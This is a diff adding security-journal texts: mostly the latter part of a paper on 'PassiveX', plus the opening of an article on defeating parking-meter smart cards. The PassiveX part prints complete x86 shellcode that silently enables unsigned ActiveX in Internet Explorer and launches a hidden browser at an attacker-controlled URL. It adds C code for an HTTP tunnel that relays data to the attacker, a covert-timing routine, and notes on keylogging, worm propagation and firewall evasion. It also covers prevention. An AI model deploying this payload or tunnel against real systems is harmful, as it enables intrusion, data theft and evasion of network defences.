+trusted. This document's implementation of the payload will
+henceforth be referred to as PassiveX (though PassiveX has been used
+for other projects, it seemed only fitting to use the name for this
+one as well).
+
+
+3.1) The ActiveX Injection Payload
+
+This section will describe the implementation of the payload that an
+exploit will send across as the arbitrary code that is to be
+executed once the exploit succeeds. This code will be executed in
+the context of the exploited process and is what will be used to
+facilitate the loading of an ActiveX control inside of an instance
+of Internet Explorer. There are, as with all things, a number of
+ways to implement this payload. The following steps describe the
+actions that such a payload would need to perform in order to
+accomplish this task.
+
+
+1.
Find KERNEL32.DLL and resolve symbols + +The first step, as is true with most Windows payloads, is to locate +the base address of KERNEL32.DLL. Determining the base +address of KERNEL32.DLL is necessary in order to load other +modules, such as ADVAPI32.DLL. The way that this is +accomplished is to resolve the address of +kernel32!LoadLibraryA. The technique used to locate the +base of KERNEL32.DLL can be any one of the typically +employed approaches, such as PEB or TOPSTACK. For +this payload, it is also necessary to resolve the address of +kernel32!CreateProcessA so that the hidden Internet +Explorer can be executed. + + +2. Load ADVAPI32.DLL and resolve symbols + +Once kernel32!LoadLibraryA has been resolved, the next step +is to load ADVAPI32.DLL since it may or may not already be +loaded. ADVAPI32.DLL provides the standard interface to +the registry that most applications, and the payload itself, need to +make use of. There are two specific functions that are needed for +the payload: advapi32!RegCreateKeyA and +advapi32!RegSetValueExA. + + +3. Open the Internet zone's registry key + +After resolving all of the necessary symbols, the next step is to +open the Internet zone's registry key for writing so that +the individual settings for ActiveX controls can be set to the +enabled status. This is accomplished by calling +advapi32!RegCreateKeyA in the following fashion: + +HKEY Key; + +RegCreateKeyA( + HKEY_CURRENT_USER, + "Software\Microsoft\Windows\CurrentVersion" + "\Internet Settings\Zones\3", + &Key); + +While testing this portion of the payload it was noted that Windows +2000 with Internet Explorer 5.0 does not have the necessary registry +keys created under the HKEY_USERS\.DEFAULT registry key. Even +if the necessary keys are created, the first time Internet Explorer +is executed from within the system service leads to the internet +connection wizard being displayed. This basically makes it such +that the payload is only capable of working on machines that have +Internet Explorer 6.0 installed (such as Windows XP and 2003 +Server). + +4. Modify IE's Internet zone restrictions + +Once the key has been successfully opened the zone restrictions for +prohibiting ActiveX controls from being used can be changed. There +are four settings that need to be toggled to ensure that ActiveX +controls will be usable: + +Setting Value Name | Description +-------------------------------- +1001 | Download signed ActiveX controls +1004 | Download unsigned ActiveX controls +1200 | Run ActiveX controls and plugins +1201 | Initialize and script ActiveX controls not marked as safe + +In order to make it so ActiveX controls can be used, each of the +above described settings must be changed to Enabled. This +is done by setting each of the values to 0 by calling +advapi32!RegSetValueExA on the opened key for each of the +individual registry values. After these values are set to enabled, +Internet Explorer will, by default, download and execute ActiveX +controls regardless of whether or not they are signed without user +interaction. The actual process of setting of a value is +demonstrated below: + +DWORD Enabled = 0; + +RegSetValueEx( + Key, + "1001", + 0, + REG_DWORD, + (LPBYTE)&Enabled, + sizeof(Enabled)); + +5. Determine the path to Internet Explorer + +With the zone restrictions modified, the next step is to determine +the full path to IEXPLORE.EXE. The reason this is +necessary is because IEXPLORE.EXE is not in the path by +default and thus cannot be executed by name. 
While +shell32!ShellExecuteA may appear like an option, it is in +fact not considering the fact that the target machine may have +Mozilla registered as the default web-browser. It should also not +be assumed that Internet Explorer will reside on a static drive, +such as the C: drive. Even though it may be common, there +are sure to be cases where it will not be true. + +One way of working around this issue is to use a very small portion +of code that determines the absolute path to internet explorer in +only two assembly instructions. The code itself makes an assumption +that Internet Explorer's installation will be on the same drive as +the Windows system directory and that it will also be installed +under its standard install directory. Barring this, however, the two +instructions should result in a portable implementation between +various versions of Windows NT+: + +url: + db "C:\progra~1\intern~1\iexplore -new http://site", 0x0 + +... + + fixup_ie_path: + mov cl, byte [0x7ffe0030] + mov byte [esi], cl + +In the above code snippet, esi points to url. The +static address being referenced is actually a portion of +SharedUserData that just so happens to point to the unicode +path of the system directory on the machine. By making the +assumption that the drive letter that the system directory is found +on will be the same as the one that Internet Explorer is found on, +it is possible to copy the first byte from the system directory path +to the first byte of the path to Internet Explorer on disk, thus +ensuring that the drive letters are the same This code has +potential issues with certain locales depending on whether or not +assumptions made about code paths or ASCII drive letters are safe.. + +6. Execute a hidden Internet Explorer with a specific target URL + +Once the full path to Internet Explorer has been located, all that +remains is to execute a hidden Internet Explorer with it pointed at +an attacker controlled HTTP server. This is accomplished by calling +CreateProcessA with the command line argument properly set +to the full path to Internet Explorer. Furthermore, the +wShowWindow attribute should be set to SW_HIDE to +ensure that the Internet Explorer instance is hidden from view. This +is accomplished by calling CreateProcessA in the following +fashion: + +PROCESS_INFORMATION pi; +STARTUPINFO si; + +ZeroMemory( + &si, + sizeof(si)); + +si.cb = sizeof(si); +si.dwFlags = STARTF_USESHOWWINDOW; +si.wShowWindow = SW_HIDE; + +CreateProcessA( + NULL, + url, // "\path\to\iexplore.exe -new " + NULL, + NULL, + FALSE, + CREATE_NEW_CONSOLE, + NULL, + NULL, + &si, + &pi); + +One important thing to note about this phase is that in order to get +it to work properly with system services that are not able to +directly interact with the desktop, the si.lpDesktop attribute +must be set to something like WinSta0\Default. + +An implementation of this approach can be found below. It is +optimized for size (roughly 400 bytes, adjusted for the variable URL +length), robustness, and portability. A large part of the payload's +size comes from the static strings that it has to reference for +opening the registry key, setting the values, and executing Internet +Explorer. The size of the payload is one of its major benefits to +this approach as it ends up being much smaller than other techniques +that attempt to accomplish a similar goal. 
+ +Targets: NT/2000/XP/2003 +Size: ~400 bytes + URL size + +passivex: + cld + call get_find_function +strings: + db "Software\Microsoft\Windows\" + db "CurrentVersion\Internet Settings\Zones\3", 0x0 +reg_values: + db "1004120012011001" +url: + db "C:\progra~1\intern~1\iexplore -new" + db " http://attacker/controlled/site", 0x0 +get_find_function: + call startup +find_function: + pushad + mov ebp, [esp + 0x24] + mov eax, [ebp + 0x3c] + mov edi, [ebp + eax + 0x78] + add edi, ebp + mov ecx, [edi + 0x18] + mov ebx, [edi + 0x20] + add ebx, ebp +find_function_loop: + jecxz find_function_finished + dec ecx + mov esi, [ebx + ecx * 4] + add esi, ebp + compute_hash: + xor eax, eax + cdq +compute_hash_again: + lodsb + test al, al + jz compute_hash_finished + ror edx, 0xd + add edx, eax + jmp compute_hash_again +compute_hash_finished: +find_function_compare: + cmp edx, [esp + 0x28] + jnz find_function_loop + mov ebx, [edi + 0x24] + add ebx, ebp + mov cx, [ebx + 2 * ecx] + mov ebx, [edi + 0x1c] + add ebx, ebp + mov eax, [ebx + 4 * ecx] + add eax, ebp + mov [esp + 0x1c], eax +find_function_finished: + popad + retn 8 +startup: + pop edi + pop ebx +find_kernel32: + xor edx, edx + mov eax, [fs:edx+0x30] + test eax, eax + js find_kernel32_9x +find_kernel32_nt: + mov eax, [eax + 0x0c] + mov esi, [eax + 0x1c] + lodsd + mov eax, [eax + 0x8] + jmp short find_kernel32_finished +find_kernel32_9x: + mov eax, [eax + 0x34] + add eax, byte 0x7c + mov eax, [eax + 0x3c] +find_kernel32_finished: + mov ebp, esp +find_kernel32_symbols: + push 0x73e2d87e + push eax + push 0x16b3fe72 + push eax + push 0xec0e4e8e + push eax + call edi + xchg eax, esi + call edi + mov [ebp], eax + call edi + mov [ebp + 0x4], eax +load_advapi32: + push edx + push 0x32336970 + push 0x61766461 + push esp + call esi +resolve_advapi32_symbols: + push 0x02922ba9 + push eax + push 0x2d1c9add + push eax + call edi + mov [ebp + 0x8], eax + call edi + xchg eax, edi + xchg esi, ebx +open_key: + push esp + push esi + push 0x80000001 + call edi + pop ebx + add esi, byte (reg_values - strings) + push eax + mov edi, esp +set_values: + cmp byte [esi], 'C' + jz initialize_structs + push eax + lodsd + push eax + mov eax, esp + push byte 0x4 + push edi + push byte 0x4 + push byte 0x0 + push eax + push ebx + call [ebp + 0x8] + jmp set_values +fixup_drive_letter: + mov cl, byte [0x7ffe0030] + mov byte [esi], cl +initialize_structs: + push byte 0x54 + pop ecx + sub esp, ecx + mov edi, esp + push edi + rep stosb + pop edi + mov byte [edi], 0x44 + inc byte [edi + 0x2c] + inc byte [edi + 0x2d] +execute_process: + lea ebx, [edi + 0x44] + push ebx + push edi + push eax + push eax + push byte 0x10 + push eax + push eax + push eax + push esi + push eax + call [ebp] +exit_process: + call [ebp + 0x4] + +3.2) HTTP Tunneling ActiveX Control + +The second stage is arbitrary in that an attacker could implement an +ActiveX control to do virtually anything. For instance, an ActiveX +control could cause a chicken wearing pants to slide around the +screen every few minutes. Though this would be patently useless, +it's nonetheless an example of the types of things that can be +accomplished by an ActiveX control. For the purposes of this +document, however, the ActiveX control will construct a +communication channel, over HTTP, between a target machine and the +attacker's machine such that arbitrary data can pass between the two +entities in a way that is compatible with restrictive outbound +filters. 
Like the payload described in the previous section, there are a
+number of ways to implement an ActiveX control capable of
+accomplishing this task. Going forward, this section requires basic
+knowledge of COM (Component Object Model).
+
+The approach taken in this document was to create an ActiveX control
+using ATL (short for Active Template Library). ATL was picked over
+MFC because MFC is less portable without CAB'ing its dependencies
+(as when dynamically linked against the MFC DLLs), or much larger
+(as when statically linked against the MFC libraries). The purpose
+of the ActiveX control, as described in this chapter, is to build an
+HTTP tunnel between the attacker and the target machine. The ActiveX
+control should also be able to, either directly or indirectly, make
+use of the HTTP tunnel, such as by piping the input and output of a
+command interpreter through the HTTP tunnel.
+
+The ActiveX control discussed in this document makes use of the HTTP
+tunnel by creating what has been dubbed a local TCP
+abstraction. This is basically a fancy term for using a truly
+streaming connection, such as a TCP connection, as an abstraction to
+the bidirectional HTTP tunnel. The reason this is advantageous is
+because it allows code to run without knowing that it is actually
+passing through an HTTP tunnel, hence the abstraction. This is
+especially important when it comes to re-using code that is natively
+capable of communicating over a streaming connection.
+
+One way in which this abstraction layer can be created is by having
+the ActiveX control create a TCP listener on a random local port.
+After that, the ActiveX control can establish a connection to the
+listener. This creates the client half of the streaming connection
+which will be used to transmit data to and from the remote machine
+in a truly streaming fashion. After the ActiveX control establishes
+a connection to the local TCP listener, it must also accept the
+connection on behalf of the listener. The server half of the
+connection is what is used both to encapsulate data coming from the
+target machine to the attacker's machine and as the truly streaming
+destination for data being sent from the attacker to the target
+machine. Data that is written to the server half of the connection
+will, in turn, be read from the client half of the connection by
+whatever it is that's making use of the socket, such as a command
+interpreter. This method of TCP abstraction even works under the
+radar of application-based filters like ZoneAlarm because the
+listener is bound to a local interface instead of an actual
+interface (this was tested with ZoneAlarm 5.5.062.011).
+
+The ActiveX control itself is composed of a number of different
+files whose purposes are described below:
+
+
+File           | Description
+---------------------------------------------
+CPassiveX.cpp  | Coclass implementation source
+CPassiveX.h    | Coclass implementation header
+HttpTunnel.h   | HTTP tunnel management class header
+HttpTunnel.cpp | HTTP tunnel management class source
+PassiveX.bin   | Interface registration data
+PassiveX.idl   | IPassiveX interface, coclass, and typelib definition
+PassiveX.rc    | Resource script containing version information, etc
+resource.h     | Resource identifier definitions
+PassiveX.cpp   | DLL exports and entry point implementations
+
+The first place to start when implementing an ActiveX control is
+with the control's interface definition which is defined in
+PassiveX.idl.
In this case, the control has its own +interface defined so that it can export a few getters and setters +that will allow the browser to set properties on an instance of the +ActiveX control. The ActiveX control requires two primary +parameters, namely the attacker's remote host and port, in order to +construct the HTTP tunnel. Furthermore, it may also be necessary to +instruct the ActiveX control that it should download more custom +code to execute once the control has been initialized, such as a +second stage payload that would make use of the established HTTP +tunnel. Parameters are typically passed using the HTML +PARAM tag in the context of an OBJECT tag. + +The three parameters that the ActiveX control in this document +supports are: + + +Property | Description +---------------------------------- +HttpHost | The DNS or IP address of the attacker controlled machine +HttpPort | The port, most likely 80, that the attacker is listening on +DownloadSecondStage | A boolean value which indicates whether or not a second stage should be downloaded + +The getters and setters for these three properties are provided +through the control's IPassiveX interface which is defined +in the PassiveX.idl file. The coclass, defined as +CPassiveX in CPassiveX.h, uses the +IPassiveX interface as its default interface. Aside from +the default interface, the ActiveX control must also inherit from +and implement a number of other interfaces in order to make it +possible for the ActiveX control to be loaded in Internet +Explorer Reference code can be found in the Metaploit +Framework. + +Once the ActiveX control's interface and coclass have been +sufficiently implemented to allow an instance to load in the context +of Internet Explorer, the next step becomes the constructing of the +HTTP tunnel. One of the easiest ways to implement this portion of +the ActiveX control is to make use of Microsoft's Windows +Internet API, or WinINet for short. The purpose of WinINet is to +provide applications with an abstract interface to protocols such as +Gopher, FTP, and HTTP. One of the major benefits to +using this API is that it will make use of the same settings that +Internet Explorer uses as far as proxying and zone restrictions are +concerned. This means that if a user normally has to send their +HTTP traffic through a proxy and has configured Internet Explorer to +do so, any application that uses WinINet will be able to share the +same settings The API also allows the programmer to +explicitly ignore the pre-cached settings if so desired.. The +actual API routines that are necessary to build an HTTP tunnel using +WinINet are described below: + + +WinINet Function | Purpose +----------------------------- +InternetOpen | Initializes the use of the other WinINet functions +InternetConnect | Opens a connection to a host for a given service +InternetSetOption | Allows for setting options on the connection, such as request timeout +HttpOpenRequest | Opens a request handle that is associated with a specific request +HttpSendRequest | Transmits an HTTP request to the target host +InternetReadFile | Reads response data after a request has been sent +HttpQueryInfo | Allows for querying information about an HTTP response, such as status code +InternetCloseHandle | Closes a WinINet handles + +The above described functions can be used to create a logical HTTP +tunnel that conforms to the HTTP protocol, appears like a normal +web-browser, and uses any pre-configured internet settings. 
The basic steps necessary to make this happen are described below:
+
+
+1. Initialize WinINet with InternetOpen
+
+In order to make it possible to use the facilities provided by the
+Windows Internet API, it is first necessary to call
+wininet!InternetOpenA. The handle returned from a
+successful call to wininet!InternetOpenA is required to be
+passed as context to a number of other routines.
+
+
+2. Create the send and receive threads
+
+Since there are two distinct channels by which data is transmitted
+and received through the HTTP tunnel, it is necessary to create two
+threads for handling both the send and the receive data. The reason
+these two channels cannot be processed in the same thread
+efficiently is because one half, the local TCP abstraction half,
+uses Windows Sockets, whereas the second half, where data is read in
+from the contents of HTTP responses between the target machine and
+the attacker's machine, uses the Windows Internet API. The handles
+used by the two APIs cannot be waited on by a common routine. This
+fact makes it more efficient to give each portion of the
+communication its own thread so that they can use the native API
+routines to poll for new data.
+
+
+3. Poll the server side of the TCP abstraction in the send thread
+
+In order to check for data being sent from the target machine to the
+attacker's machine, it is necessary to poll the server side of the
+TCP abstraction. This can be accomplished by calling
+ws2_32!select on an fd_set that contains the
+server half of the connection that was established to the local TCP
+listener. When ws2_32!select returns one it indicates that
+there is data of some form available for processing, whether it be
+actual data to be read from the socket or an indication that the
+socket has closed. When this occurs a call to ws2_32!recv
+can be made to read data from the socket. If zero is returned it
+indicates that the local connection has been terminated. Otherwise,
+if a value larger than zero is returned, it indicates the number of
+bytes actually read from the connection. The buffer that the data
+was read into can then be used as the body content of an HTTP
+POST request that is transmitted to the attacker. This
+cycle repeats itself until the local connection eventually closes,
+an error is encountered, or the stateless tunnel between the two
+endpoints is terminated.
+
+
+4. Poll for data from the remote side of the HTTP tunnel
+in the receive thread
+
+Polling for data that is being sent from the attacker to the target
+machine is not as simple as the other direction simply due to the
+fact that the polling operation must be simulated using an HTTP
+GET or POST request instead of using a native
+routine to check for new data. This approach is necessary in order
+to remain compliant with HTTP's request/response format. The actual
+implementation is as simple as an infinite loop that continually
+transmits an HTTP request to the attacker requesting data that
+should be written to the server side of the TCP abstraction. If
+data is present, the attacker will send an HTTP response that
+contains the data to be written in the body of the response. If no
+data is present, the attacker can either wait for data to become
+available or respond with no content in the response. In either
+case, the polling thread should repeat itself at certain intervals
+(or immediately if data was just indicated) for the duration of time
+that the stateless HTTP tunnel between the two endpoints stays up. A
+rough sketch of these steps can be found below.
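+
+The fragment below is only an illustrative, single-threaded
+approximation of these steps, not code taken from the actual PassiveX
+control. It assumes that sock is the server half of the local TCP
+abstraction described earlier and that the attacker's host and port
+are already known; the "/tx" and "/rx" object names, the user agent
+string, and the helper names (tunnel_open, tunnel_poll_once) are
+placeholders chosen for the example, and nearly all error handling is
+omitted.
+
+#include <winsock2.h>
+#include <windows.h>
+#include <wininet.h>
+
+#pragma comment(lib, "wininet.lib")
+#pragma comment(lib, "ws2_32.lib")
+
+//One pass of the send/receive polling described in steps 3 and 4.
+void tunnel_poll_once(HINTERNET conn, SOCKET sock)
+{
+    char           buf[4096];
+    DWORD          read = 0;
+    int            got;
+    HINTERNET      req;
+    fd_set         fds;
+    struct timeval tv = { 1, 0 };
+
+    //Send side: wrap any pending local data in the body of a POST
+    FD_ZERO(&fds);
+    FD_SET(sock, &fds);
+
+    if(select(0, &fds, NULL, NULL, &tv) > 0 &&
+       (got = recv(sock, buf, sizeof(buf), 0)) > 0) {
+        req = HttpOpenRequestA(conn, "POST", "/tx", NULL, NULL, NULL,
+                               INTERNET_FLAG_RELOAD, 0);
+        if(req) {
+            HttpSendRequestA(req, NULL, 0, buf, got);
+            InternetCloseHandle(req);
+        }
+    }
+
+    //Receive side: poll the attacker and write any response body to
+    //the server half of the local connection
+    req = HttpOpenRequestA(conn, "GET", "/rx", NULL, NULL, NULL,
+                           INTERNET_FLAG_RELOAD, 0);
+    if(req) {
+        if(HttpSendRequestA(req, NULL, 0, NULL, 0)) {
+            while(InternetReadFile(req, buf, sizeof(buf), &read) && read > 0)
+                send(sock, buf, (int)read, 0);
+        }
+        InternetCloseHandle(req);
+    }
+}
+
+//Step 1, for completeness: the connection handle used above would come
+//from something along these lines, inheriting IE's preconfigured proxy
+//settings via INTERNET_OPEN_TYPE_PRECONFIG.
+HINTERNET tunnel_open(const char *host, unsigned short port)
+{
+    HINTERNET inet = InternetOpenA("Mozilla/4.0 (compatible)",
+                                   INTERNET_OPEN_TYPE_PRECONFIG,
+                                   NULL, NULL, 0);
+
+    return inet ? InternetConnectA(inet, host, port, NULL, NULL,
+                                   INTERNET_SERVICE_HTTP, 0, 0) : NULL;
+}
+
+In the real control the send and receive halves would run in their own
+threads, as described in step 2, with the receive loop repeating at
+some interval for as long as the tunnel stays up.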
+ +Beyond these simple tasks, the ActiveX control can also download and +execute a second stage payload in the context of its own thread. +This second stage payload could be passed the file descriptor of the +client half of the TCP abstraction which would allow it to +communicate with the attacker over a truly streaming socket that +just so happens to be getting encapsulated and decapsulated in HTTP +requests and responses. There are also a number of other things +that could be developed into the ActiveX control to make it a more +robust platform from which further attacks could be mounted. These +extensions will be discussed more in the next chapter. + + +4) Potential Uses and Enhancements + +The PassiveX payload has the ability to be used for a wide array of +things regardless of whether or not an HTTP tunnel is even used. The +ability for a payload to inject an untrusted ActiveX control into an +Internet Explorer instance without any user interaction at all is +enough to give an attacker full control over the machine without the +attacker so much as typing a single command. The ways in which such +a thing could be accomplished could be through the development of a +robust and feature-filled ActiveX control that may or may not make +use of an HTTP tunnel between the target host and the attacker. This +abstract concept will be discussed alongside other more concrete +uses for this technique in the sections of this chapter. + + +4.1) Automation with Scripting + +An abstract application of this payload would be to create an +ActiveX control that provides a scriptable interface to the machine +that it is loaded on. This would let an attacker interface with the +generic ActiveX control via JavaScript or vbscript in a manner that +would allow for easy automation and control of the machine that it's +loaded on. For instance, the ActiveX control could provide, via its +COM interface or interfaces, a scripting-accessible API to things +like the filesystem, networking, the registry, and other core +components of the operating system. The primary benefit to +implementing an ActiveX control that provides access to components +such is these is that automated code can be written in a browser +supported scripting language rather than having to modify the +ActiveX control itself each time a new feature is to be added. The +use of a scripting interface can be seen as a more flexible method +of interacting with a machine, though it does come at the cost of +requiring the ActiveX control to expose enough of the operating +system's feature set to make it useful. + + +4.2) Passive Information Gathering + +In some situations the ActiveX control may not have enough +information to create an HTTP tunnel between the target machine and +the attacker. An example of information that the control would need +but may not have is proxy authorization credentials. In cases such +as these it would be possible for the ActiveX control to be enhanced +to support keystroke logging and other forms of information +gathering that would allow it to collect enough data to be able to +build some sort of data channel. The ActiveX control could also be +extended to make the data channel more covert by having it vary both +in protocol, such as by switching to and from DNS, and in delay, +such as by causing HTTP posts to be spread out in time to make them +appear less suspicious. 
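+
+As a minimal illustration of the idea of spreading requests out in
+time, a delay routine along these lines could be called between
+iterations of a polling loop such as the one sketched in the previous
+chapter. The five to thirty-five second window is an arbitrary value
+chosen for the example, not something used by PassiveX.
+
+#include <windows.h>
+#include <stdlib.h>
+
+//Sleep for a randomized period so that successive poll requests are
+//not evenly spaced; the bounds here are arbitrary.
+void jittered_poll_delay(void)
+{
+    DWORD delay = 5000 + (rand() % 30001);
+
+    Sleep(delay);
+}
+
+The trade-off is the usual one for covert channels: the longer and
+more irregular the delays, the less responsive the tunnel becomes.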
+ + +4.3) Penetration Testing + +Perhaps one of the must useful cases for the PassiveX payload is in +the field of penetration testing where it's not always possible to +get into a network by the most direct means. It is common practice +for corporations to make use of some sort of outbound filter, +whether it be network-based, application-based, intermediate, or a +combination of all three. Under conditions like these, a +penetration tester may find themselves capable of exploiting a +vulnerability but without an ability to really take control of the +machine being exploited. In cases such as these it would be useful +to have a payload that is capable of constructing a tunnel over an +arbitrary protocol, such as HTTP, that is able to bypass outbound +filters. + +This approach is also useful to a penetration tester in that it may +also be possible for them to make meaningful use of client-side +vulnerabilities that would otherwise be incommunicable due to +restrictive outbound filters. A particularly interesting +illustration of such an approach would be to demonstrate how +dangerous client-side browser vulnerabilities can be by showing that +even though a company employs outbound filters on the content that +leaves the network, it is still possible for an attacker to build a +streaming connection to machines on the internal network once a +browser vulnerability has been taken advantage of. Though such a +scenario will most likely not be the norm during penetration +testing, it is nonetheless a useful tool to have in the event that +such a case presents itself. + + +4.4) Worm Propagation + +There are uses for the PassiveX payload on the malicious side of the +house as well. Due to the payload's ability to support automation +through scripting and its inherent ability to allow for the +construction of tunnels over arbitrary protocols, it seems obvious +that such a tool could be useful in the realm of worm propagation. +Take for instance a worm that spreads through server-side daemon +vulnerabilities and also by embedding client-side browser +vulnerabilities into the web sites of web servers that become +compromised. The payload for the client-side browser +vulnerabilities would be the PassiveX payload which would then +download an inject an ActiveX control from a de-centralized location +that would be responsible for the continued propagation of the worm +through the same vectors. The payload's transmission over trusted +protocols would make it just that much harder to stop assuming some +level of effort were put forth to make the communication +indistinguishable from normal browser traffic. + + +5) Methods of Prevention + +Now that a payload has been defined that is capable of bypassing +standard outbound filters, the next step is to determine potential +solutions in order to assist in the prevention of such techniques. +Though efforts can be made elsewhere to prevent exploitation in the +first place, it is still prudent to attempt to analyze approaches +that could be taken to prevent a payload like the one described in +this document from being used in a real world scenario. The primary +concern when implementing a prevention mechanism, however, is that +it must not also prevent normal user traffic from working as +expected and should also be robust enough to catch future mutations +of the same technique. A failure to succeed on either of these +points is an indication that the prevention method is not entirely +viable or sound. 
With that in mind, two potential methods of +prevention will be described in this chapter, though neither of them +should be seen as complete method of prevention. The key point +again is that as long as it's possible for a user to communicate +with the internet, so too will it be possible for an attacker to +simulate traffic that looks as if it's coming from a user. + + +5.1) Heuristic based filtering + +One method of prevention would be to implement an outbound filter +that made use of contextual heuristics to determine if the traffic +passing between two hosts might be potentially indicative of +encapsulated data. For instance, a transparent HTTP proxy could +monitor and track the variance of form and the spacing of requests +and responses between two hosts. In the case of the simple HTTP +tunnel described in this document, a transparent HTTP proxy could +note that there is very little variance between the headers of both +the requests and the responses and that the form of communication +between the two hosts is unchanging. Though this could be made to +work, there are a number of problems that make using this technique +of prevention not entirely viable. + +The first and foremost problem with this technique is that it does +not actually prevent communication between the two entities until it +is able to determine that the requests and responses are of a common +form and pattern. This alone makes this method of "prevention" +entirely unreasonable, but it is nonetheless worthy of consideration +from a completeness standpoint. Other problems with this approach +include the fact that it's very easy to fool by making the +communication unpredictable, sporadic, and very similar to normal +HTTP traffic. This fact makes using a heuristic based form of +validation less favorable as it will always need to error towards +non-positive in order to prevent a poor user experience for +legitimate traffic passing through the proxy. + + +5.2) Improving application-based filters + +Another approach that can be taken to prevent tunneling through +arbitrary protocols is to enhance application-based filters. For +instance, PassiveX relies on its ability to execute a hidden +instance of Internet Explorer. If the execution of a hidden +Internet Explorer weren't permitted or the hidden instance were +unable to access network resources, the payload would not be +functional There have been rumors of decisions to make it +impossible to execute a hidden Internet Explorer, though no concrete +information has been posted at the time of this writing.. It would +also be useful to support application-based filters on network +activity that occurs on the loopback interface, such as binding to a +TCP port on loopback. However, support for this requires a different +approach than what is typically employed by most firewall vendors +and would not necessarily be indicative of a malicious +program Most firewall products for NT-based versions of +Windows are implemented as NDIS intermediate drivers since such +drivers provide the lowest level of supported filtering.. + +Perhaps one of the most useful enhancements would be to add +state-based filtering. One example of a state-based filter would be +to prevent outbound communication of applications like Internet +Explorer while the user is idle. Though this doesn't prevent +communication while the user is active, it does add another layer of +protection. 
Another example of a state-based filter would be to +track unrequested internet traffic and to ask the user if it should +be permitted. An example of unrequested internet traffic comes in +the form of the initial HTTP request that is made by the hidden +internet explorer. In this case, the Internet Explorer process was +not spawned by a user and thus the internet traffic can rightly be +deemed unrequested. + + +6) Conclusion + +Securing a network involves protecting it from being compromised +both from the outside and from the inside. To protect both of these +conditions, network administrators may make use of outbound filters +to help control and limit the type of content that is allowed to +leave the network in conjunction with inbound filters that control +and limit the type of content that is allowed to enter the network. +While filtering data in both directions is important, it is not +always enough to stop machines inside the network from being +compromised. Outbound filters in particular, whether employed at +the network, application, or intermediate level are all easily +bypassed by virtue of the fact that they allow users of the machine +to communicate with hosts on the internet in some form or another. + +In order for an attacker to bypass outbound filters, the attacker +must find a way to look like acceptable user traffic. One way of +approaching this is to implement a payload that enables the +execution of both signed and unsigned ActiveX controls in Internet +Explorer's Internet zone. Once enabled, the payload could +then launch a hidden Internet Explorer using a URL that contains an +embedded ActiveX control. From there, the ActiveX control could +construct an HTTP tunnel between the target machine and the +attacker, thus creating a channel through which data can be passed +in a fashion that will bypass most network's outbound filters. The +reason this bypasses most outbound filters is because it uses a +trusted protocol, such as HTTP, and is executed in the context of a +typically trusted process, such as Internet Explorer, in an attempt +to make the traffic appear legitimate. + +The benefits of such a payload vary based on a person's alignment. +However, it goes without saying that it could be potentially useful +to both sides of the fence. Whether used for penetration testing or +for worm propagation, the ability to bypass outbound filters makes +for an interesting connection medium beyond those typically used by +post-exploitation payloads, such as those that establish reverse +connections or listen on a port. Preventing payloads such as these +from being possible might involve enhancing the ability of outbound +filters to differentiate user traffic from non-user traffic. + +There's no question that the field of exploitation and +post-exploitation research is filled with vast amounts of ingenuity. +The very act of making something do what no one else considered, or +in ways no one considered, is one of the many examples of +creativity. However, with ingenuity comes a certain sense of +responsibility. While the topics expanded upon in this document +could be used for malicious purposes, the author hopes that instead +the reader will use this knowledge to discover or expand on things +that have yet to be discussed, thus making it possible to continue +the cycle of education and enlightenment. + + +Bibliography + +3APA3A, offtopic. Bypassing Client Application Protection Techniques. +http://www.securiteam.com/securityreviews/6S0030ABPE.html; +accessed Mar 17, 2005. 
+ + +Dubrawsky, Ido. Data Driven Attacks Using HTTP Tunneling. +http://www.securityfocus.com/infocus/1793; accessed +Mar 15, 2005. + + +GNU. GNU httptunnel. +http://www.nocrew.org/software/httptunnel.html; +accessed Mar 15, 2005. + + +iDEFENSE. AOL Instant Messenger aim:goaway URI Handler Buffer Overflow Vulnerability. +http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities; +accessed Mar 08, 2005. + + +Microsoft Corporation. Working with Internet Explorer 6 Security Settings. +http://www.microsoft.com/windows/ie/using/howto/security/settings.mspx; +accessed Mar 15, 2005. + + +Microsoft Corporation. The Component Object Model: A Technical Overview. +http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncomg/html/msdn_comppr.asp; +accessed Mar 16, 2005. + + +Microsoft Corporation. About WinINet. +http://msdn.microsoft.com/library/default.asp?url=/library/en-us/wininet/wininet/about_wininet.asp; +accessed Mar 16, 2005. + + +OSVDB. Microsoft IE Object Type Property Overflow. +http://www.osvdb.org/displayvuln.php?osvdb_id=2967; +accessed Mar 08, 2005. + + +rattle. Using Process Infection to Bypass Windows Software Firewalls. +http://www.phrack.org/show.php?p=62&a=13; accessed +Mar 17, 2005. diff --git a/uninformed/1.3.txt b/uninformed/1.3.txt new file mode 100644 index 0000000..720ee1f --- /dev/null +++ b/uninformed/1.3.txt @@ -0,0 +1,752 @@ + + ==Uninformed Research== + +|=-----------------------=[ Smart Parking Meters ]=---------------------=| +|=----------------------------------------------------------------------=| +|=------------------=[ h1kari ]=-----------------=| + +--=[ Contents ]=---------------------------------------------------------- + + 1 - Introduction + 2 - ISO7816 + 3 - Synchronous Cards + 3.1 - Memory Cards + 3.2 - Parking Meter Debit Cards + 3.3 - The Simple Hack + 4 - Memory Dump + 5 - Synchronous Smart Card Protocol Sniffing + 5.1 - Sniffer Design + 5.2 - Sniffer Code + 6 - Protocol Analysis + 6.1 - Decoding Data + 6.2 - Timing Graph + 6.3 - Conclusions + 7 - Conclusion + + +--[ 1 - Introduction ]---------------------------------------------------- + + If this whitepaper looks a little familiar to you, I'm going to admit +off the bat that it's based a bit on Phrack 48-10/11 (Electronic Telephone +Cards: How to make your own!) and is using a similar format to Phrack +62-15 (Introduction for Playing Cards for Smart Profits). I highly +recommend you read both of them if you're trying to learn about smart +cards. + + I'm sure that many of you that live near a major city have seen +parking meters that require you to pay money in order to park in a spot. +Upon initial analysis of these devices you'll notice there is a slot for +money to go in. On some, there is also a slot for a Parking Meter Debit +Card that you can purchase from the city. This article will analyze these +Parking Meters and their Debit Cards, show how they tick, and show how you +can defeat their security. + + The end goal however is to provide enough information so you can +create your own tools to learn more about smart cards and how they work. +I have no intention of having people use this article to rip off the +government, this is for educational purposes only. My only hope is that by +getting this information out there, security systems will be designed more +thoroughly in the future. + + PARKING METER + + _,-----,_ + ,-' `-, + / ._________. 
